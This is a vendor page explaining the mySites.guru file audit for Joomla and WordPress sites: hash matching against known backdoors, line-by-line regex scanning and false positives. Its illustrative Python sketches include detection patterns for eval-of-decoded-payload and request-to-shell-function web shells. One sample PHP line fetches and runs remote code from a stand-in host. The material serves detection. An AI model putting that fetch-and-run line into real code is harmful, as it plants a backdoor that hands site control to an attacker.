The average number of files in the 62,000+ sites connected to mySites.guru is just under 20,000 files. 😲
The mySites.guru suspect content tool is one of the suite of amazing unique tools in the audit part of the mySites.guru service.
This tool allows you to identify and review any files that we believe are suspect, or that match our rules for other reasons.
You can use this tool to see the “wood for the trees” and find the “needle in the haystack”: instead of manually looking through the 1 million files in your website, we give you a short list to review.
Data Gathering – the mySites.guru audit
The start of the process is to run a mySites.guru audit.
This gathers information on every file in your webspace – with no exceptions. The audit process takes a short while but you can walk away from the screen and come back later.
Subscribers can schedule audits to run as often as they like, or run them on demand.
The audit first compiles a list of all the folders in your webspace – without exceptions – and then grabs a list of the files in those folders.
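The two-pass approach described above (folders first, then the files inside them) can be sketched roughly as follows. This is a minimal illustration in Python, not the actual mySites.guru audit code; the function names `list_folders` and `list_files` are hypothetical.

```python
import os
from pathlib import Path


def list_folders(root: Path) -> list[Path]:
    """Pass 1: collect every folder under root, including root itself."""
    folders = []
    for dirpath, _dirnames, _filenames in os.walk(root):
        folders.append(Path(dirpath))
    return sorted(folders)


def list_files(folders: list[Path]) -> list[Path]:
    """Pass 2: collect every regular file that sits directly in each folder."""
    files = []
    for folder in folders:
        with os.scandir(folder) as entries:
            for entry in entries:
                # Symlinks are not followed in this sketch (an assumption).
                if entry.is_file(follow_symlinks=False):
                    files.append(Path(entry.path))
    return sorted(files)
```

Splitting the work into two passes means the folder list is known before any file is inspected, which makes it easier to report progress on a long-running audit.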
We then run an exhaustive process which includes:
- Identifying if the file is a core Joomla or WordPress file
- If it’s a core file, identifying if that file has been modified since release
- If the core file is modified, doing a comparison with the original file
- Storing the md5 hash of the file for future comparison
- Looping through every single line of code in every single file
- Searching every single line of code, for one of nearly 2000 patterns of previous hacks we have seen, and if found marking a file as “suspect”
- Checking the md5 hash of the file against over 14,000 specific md5 hashes of previously declared “hacked” files. There are no false positives: each of these 14,000 md5 hashes has been manually checked and confirmed to match a file which is hacked
- We check the created, modified and other metadata of each file, including the EXIF data on images (where hacks are known to reside!)
- We identify any encrypted files, PHP error logs, archive files, files over 2 MB in size, zero byte files and many other classifications
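A few of the per-file checks in the list above (storing the md5 hash, recording size and modified time, and flagging zero byte files, large files, archives and error logs) could look something like this in Python. It is only a sketch: the suffix list, the log file names, the label names and the reading of "2 MB" as 2 MiB are all assumptions made for illustration, not the rules the service uses.

```python
import hashlib
from pathlib import Path

# All three constants are illustrative assumptions, not the service's rules.
LARGE_FILE_BYTES = 2 * 1024 * 1024  # "over 2 MB", taken here as 2 MiB
ARCHIVE_SUFFIXES = {".zip", ".tar", ".gz", ".tgz", ".bz2", ".rar", ".7z"}
ERROR_LOG_NAMES = {"error_log", "php_errorlog", "php_errors.log"}


def md5_of_file(path: Path) -> str:
    """Hash the file in chunks so large files are not loaded into memory."""
    digest = hashlib.md5()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def classify(path: Path) -> dict:
    """Return the metadata and classification labels for one file."""
    stat = path.stat()
    labels = []
    if stat.st_size == 0:
        labels.append("zero-byte")
    if stat.st_size > LARGE_FILE_BYTES:
        labels.append("large")
    if path.suffix.lower() in ARCHIVE_SUFFIXES:
        labels.append("archive")
    if path.name.lower() in ERROR_LOG_NAMES:
        labels.append("error-log")
    return {
        "path": str(path),
        "md5": md5_of_file(path),
        "size": stat.st_size,
        "modified": stat.st_mtime,
        "labels": labels,
    }
```

Storing the hash alongside the metadata is what makes the "future comparison" possible: if the hash differs on the next audit, the file has changed.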
Once the audit is over we notify you so you can log in to mySites.guru and review the results. The screenshot below shows the first three sections of the audit tab.
Check every line in every file
The audit process will look at every single line of every single file in your webspace without skipping any (apart from our own internal list of exceptions and whitelisted files/hashes/patterns).
The difference between us and other “scanners” is that they only look at the rendered output of your site, not all the files in your webspace. We even include files that are not used to render your site – known as backdoors – that could be hiding in your webspace unused for years before being identified and used by a hacker.
Suspect Content Match
The mySites.guru audit has several ways to identify suspect content.
The main two are:
- Over 2000 regex patterns based on historic hacks seen on real Joomla/WordPress sites over the years, including emerging hacks and mutated hacks seen in the last few weeks. These files are just suspect – there will be false positives by design – and not everything from this list will be bad, or hacks, or backdoors.
- Whole file hashes, that match the whole file, instantly marking these files as hacked, with a red [Hacked] label in the file tool results. These are normally backdoors and match hashes of files we have seen in the past.
Complete file match – md5 hash
When we discover a backdoor file (like c99, r57 or any file that is hacked) we calculate the md5 hash of the entire file and store that.
On the next audit of any site connected to mySites.guru, we distribute these new hashes and look for files in YOUR webspace that might match these.
If a file on your site matches any of our hashes then we will mark that with a red [HACKED FILE] flag in the audit results.
There are no false positives here. If the hash matches it IS a hacked file. Fact.
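As a rough illustration of why a whole-file hash match is so precise, here is a small Python sketch. The function name `is_known_hacked` and the sample bytes are hypothetical; a real list would hold the md5 digests of files that have been manually confirmed as hacked.

```python
import hashlib


def is_known_hacked(content: bytes, known_hashes: set[str]) -> bool:
    """True only if the md5 of the whole file is in the known-hacked set."""
    return hashlib.md5(content).hexdigest() in known_hashes


# Hypothetical stand-in for a confirmed backdoor file.
sample_backdoor = b"<?php /* pretend this is a known backdoor */ ?>"
known_hashes = {hashlib.md5(sample_backdoor).hexdigest()}

# An exact copy matches; a copy with one extra byte does not.
exact_copy_matches = is_known_hacked(sample_backdoor, known_hashes)
altered_copy_matches = is_known_hacked(sample_backdoor + b" ", known_hashes)
```

The flip side of that precision is that changing even a single byte produces a different hash, so a mutated copy of a backdoor will not match. That is where the second, pattern-based level of detection comes in.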
Single pattern match – Over 2000 regex patterns
The second level of detection is suspect content based on regex.
A “regex” (regular expression) is a pattern-based match. We use over 2000 patterns that we have curated over the last decade, and improve daily.
These find the normal things, like use of gzinflate on the same line, and the other cool tricks that hackers use.
Our regex patterns also find PARTS of hacks. This lets a file be inspected line by line to find smaller snippets of hacks, for cases where a hack has been injected into an otherwise genuine file, as opposed to the whole file being a hack/backdoor.
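To make the line-by-line idea concrete, here is a minimal Python sketch of a scanner that reports the exact line number each pattern matched on. The two patterns and their rule names are invented for illustration; they are assumptions, not rules from the mySites.guru pattern set.

```python
import re
from typing import NamedTuple

# Two illustrative patterns (assumptions), keyed by a made-up rule name.
PATTERNS = {
    "eval-of-decoded-payload": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate)\s*\(", re.IGNORECASE
    ),
    "request-data-to-exec": re.compile(
        r"(?:system|passthru|shell_exec)\s*\(\s*\$_(?:GET|POST|REQUEST)",
        re.IGNORECASE,
    ),
}


class Match(NamedTuple):
    line_number: int
    rule: str
    line: str


def scan_text(text: str) -> list[Match]:
    """Check every line against every pattern and record each hit."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in PATTERNS.items():
            if pattern.search(line):
                hits.append(Match(number, rule, line.strip()))
    return hits
```

Because each hit carries its line number, a file that is mostly genuine code with one injected line can be reported as "line 3 of this file", rather than just "this file".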
Not everything that matches our patterns will be a hack! This is by design! The problem is that PHP is the language your genuine code is written in, and PHP is (mainly) the language the hacks are written in, so you are both using the same language. For example, if you both spoke English and we searched for the word “The”, there would be matches in both hacks and genuine code. However, we work very hard to keep the number of matches on genuine code to a minimum, so instead of having to look at 20,000 files for a hack, you can review the handful of files that the mySites.guru audit identifies.
Reduce your time looking for hacks
The average site, based on the 63,000 sites mySites.guru is connected to, has 19,882 files! That is a lot of files to manually sort through looking for hacks.
The results of the mySites.guru audit give you a handful of files to look through – what’s more, we give you an easy interface to view the exact lines of the exact files that we list – no need to fire up your FTP application or look through your file system manually.
If your file is a known backdoor for a hacker – we mark it as such!
By clicking any of the file names, you can see a preview of the section of the file we think is suspect. You can also see when it was modified, its size, and its permissions.
You can use our tools to edit the file directly in mySites.guru and then save the changes, and we will upload them to your site – no need to find your FTP Client! You can also delete the whole file with a single click.
Crowd Sourced Data Model
After every audit, the mySites.guru detection improves. Anonymous data on the suspect content found is submitted to our internal queue and after manual review is added to future iterations of our data model.
In plain language, this means if a new hack is found on a Joomla Site, then on the next audit of YOUR Joomla sites, we will look for that hack – this means by being connected to mySites.guru you benefit from all the knowledge gained in fixing and identifying hacks on all other sites.
This also allows us to track trends and waves of infections and improve the detection of new and mutated hacks and backdoors.
This data model improvement alone makes mySites.guru unique and sets us apart!
Detection Improves Daily
Across the mySites.guru service we run over 3000 audits of Joomla and WordPress sites per day (at the time of writing) – this means we always have up to date information on the very latest hacks and waves of backdoors seen across the world.
We find over 200 hacked sites a week.
What about false positives?
Not everything that matches our patterns will be a hack!
This is by design!
The problem is that PHP is the language your genuine code is written in, and PHP is (mainly) the language the hacks are written in, so you are both using the same language. For example, if you both spoke English and we searched for the word “The”, there would be matches in both hacks and genuine code. However, we work very hard to keep the number of matches on genuine code to a minimum, so instead of having to look at 20,000 files for a hack, you can review the handful of files that the mySites.guru audit identifies.
Can I whitelist files or folders?
To allow exceptions would defeat the inclusiveness of the tool and water down its effectiveness.
I expect you WILL get false positives, and that is fine, annoying but fine. You get these because we have chosen to show you rather than hide these files, just in case. Sometimes pattern matching is not enough and a human with experience in code needs to make a judgement call on a file (Feel free to ask me for a quick peek!)
You see, hackers use the same code that good developers use (Like curl, file_get_contents, $_GET etc…) – so sometimes it’s hard to tell if some code is evil, without context, and you cannot get context with a dumb tool that pattern matches.
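Here is a tiny Python sketch of that problem. The pattern and both PHP lines are made up for illustration (assumptions, not real rules or real samples): one deliberately broad rule flags any remote fetch through file_get_contents.

```python
import re

# Hypothetical broad rule: any remote URL fetched with file_get_contents.
REMOTE_FETCH = re.compile(r"""file_get_contents\s*\(\s*['"]https?://""")

# A genuine extension reading a news feed...
genuine = "$feed = file_get_contents('https://example.com/news.xml');"
# ...and a backdoor pulling down and running a payload.
hostile = "eval(file_get_contents('http://example.invalid/payload.txt'));"


def flagged(line: str) -> bool:
    """True if the line matches the broad remote-fetch rule."""
    return bool(REMOTE_FETCH.search(line))
```

In this sketch `flagged(genuine)` and `flagged(hostile)` both come back true. The pattern cannot tell them apart; only someone reading the surrounding code can, which is why both kinds of file are shown for review.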
We do not allow users to whitelist anything anymore
We used to, then it soon became clear that some users don’t have a clue what’s a hack and what’s not – and a user whitelisted everything and then sued us for not telling him his site was hacked. After legal fees we were £14,000 out of pocket.
Plus, as mySites.guru uses crowdsourced data and machine learning, too many “fake” whitelists have a huge knock-on effect on our integrity.
I personally am the only one that whitelists, and I do it rarely
The whole point of the tool, as it clearly explains, is to generate false positives as well as 100% exact matches – this way we also capture emerging hacks and extremely bad practice by extension developers.
Comparison to external “scanners”
Other services claim to have an “audit” tool. Most of the time they mean they have implemented the Sucuri SiteCheck API, which only “scans” your site as a visiting browser would. It doesn’t check the files in your webspace, and doesn’t find anything that is hidden under the surface of your rendered webpages. Be warned. Not all “Audits” are in-depth and comprehensive! Make sure you compare apples with apples. Not everyone claiming to be an “apple” is.
We currently (at the time of writing) do not scan database tables for malware, meaning that we will sometimes miss WordPress SQL injected posts. We are actively working on a solution for this.
BONUS: Out of your depth? Need help?
If the mySites.guru audit finds your Joomla or WordPress site is hacked, and you are unsure how to fix it with our tools, or just want us to take care of everything for you, you can escalate this to us using the service at https://fix.mysites.guru/ for SET FEE priced hack fixes.